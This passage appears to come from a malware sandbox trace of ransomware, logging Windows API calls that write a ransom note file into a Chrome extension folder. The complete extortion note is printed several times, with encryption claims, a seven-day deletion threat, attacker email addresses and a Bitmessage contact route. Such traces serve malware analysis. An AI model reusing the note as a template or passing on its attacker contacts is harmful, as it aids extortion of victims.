\\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.570] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.570] CloseHandle (hObject=0x2f0) returned 1 [0286.570] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0286.571] GetLastError () returned 0x2 [0286.571] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.571] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.571] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.571] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me 